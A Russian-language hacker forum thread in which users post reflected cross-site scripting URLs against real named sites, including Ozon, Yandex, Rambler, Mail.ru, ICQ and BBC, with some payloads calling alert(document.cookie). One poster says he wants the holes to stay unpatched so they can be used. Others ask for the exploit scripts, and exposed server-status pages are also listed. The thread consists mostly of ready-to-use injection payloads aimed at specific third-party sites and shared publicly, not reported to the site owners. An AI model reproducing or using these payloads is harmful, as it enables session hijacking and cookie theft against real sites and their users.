сёдня нашёл хсс у народа и озона
http://zaco.jino-net.ru (http://zaco.jino-net.ru/)
------
http://www.ozon.ru/context/mcode_list/id/12/?sort=bests&from=xaxa"><script>alert('XAXA')</script><a=" http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('XAXA')</script><a%20a=&c=2xaxa
------
оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!))

сёдня нашёл хсс у народа и озона
http://zaco.jino-net.ru (http://zaco.jino-net.ru/)
------
оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!))Впреть, выкладывай не ссылку на свой сайт, а сами скрипты(свриптовые сплойты).!!!

Работает. Только про эту багу помоему гдето здесь уже и писали =))))

оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!))
раз не согласен, то ищи сам и выкладывай, а я хочу чтобы еще пожили уязвимости, если кому-то надо будет, чтобы воспользовался бы, и чтобы не боялся что из-за какого-то дебила эту багу прикроют.
Но я выложу, вопрос тока времени.
Я сам за свободу инфы, но все таки сущ. люди, которую эту свободу обращают во зло, я постараюсь чтобы этого не было.

Модлодец ZaCo

Вот еще одна. Жалко её не поюзаешь.
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3Ealert('x')%3C/script%3E

http://search.rambler.ru/cgi-bin/advanced.cgi?set=0"><script>alert(/testing_by_censored!/)</script>

http://talk.mail.ru/login.html?target=0"><script>alert(/testing_by_censored!/)</script>

http://www.ganjawars.ru/trade-terminal.php?object_id=13925&resource=123321><script>alert(/testing_by_censored!/)</script>

http://www.august4u.ru/gb/?id=><script>alert(/tested_by_censored!/)</script>&gb=&page=1234567

http://ww2.tymoshenko.com.ua/rus/subscribe/?USER_SUB_FORM%5BFORM_ACTION%5D=TEST_EMAIL&USER_SUB_FORM%5Bres_id%5D=&USER_SUB_FOR
M%5Buser_email%5D=%3Cscript%3Ealert%28123%29%3C%2F script%3E&go=%C4%E0%EB%B3+%3E%3E+

http://www.forsakenworld.ru/cgi/register.cgi?action=<script>alert(/testing_by_censored!/)</script>

http://www.xakep.ru/post/26703/default.asp?print=12345"></iframe><script>alert(/testing_by_censored!/)</script>

В профиле создаст новую XSS-папку:
http://forum.xakep.ru/profile/manfolders.asp?mode=create&foldername=<script>alert(/testing_by_censored!/)</script>&x=53&y=14

RAMBLER.RU:

http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>

http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(document.cookie)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words="><script>alert(document.cookie)</script>&ftype=5&form=0&hu=1&what=0

ICQ.COM:

http://www.icq.com/boards/atoz.php?letter=</title><script>alert(document.cookie)</script><title>

YANDEX.RU:

http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(document.cookie)</script>

тоже интересно:

http://info.rambler.ru/server-status

http://info.rambler.ru:8100/server-status

:D :D :D

2k1b0rg : во-первых я сам и нашёл. во-вторых - это хсс, думаю если бы я нашёл к примеру инклуд в яндексе=) то об этом я сразу бы не сообщал)) я клоню к тому что скрывать от посторонних глаз хсс глупо - тк такие баги находятся сразу и не представляют особой ценности+) я инашёл за 5 минут глупо имхо
2k00p3r хз сам не видел раньше
---
http://cards.yandex.ru/theme.xhtml?st=Family&topic=Husb-and-Wives&series=xaxa"><script>alert('XAXA')</script><a%20s="
---
http://www.bbc.co.uk/cgi-bin/education/betsie/parser.pl/0005/<script%20src=javascript:alert('XAXA') - на bbc.com все ссылки вели именно на bbc.co.uk
---
http://www.bbc.co.uk/cgi-perl/weather/search/new_search.pl?search_query=xaxa<script>alert('XAXA')</script>
---

2censored, VectorG, ZaCo
ЭЭэ, хватит... :)))

http://info.rambler.ru/db/auth/ed/view.html?auth_id=1384&auth_id=1484&auth_id=19&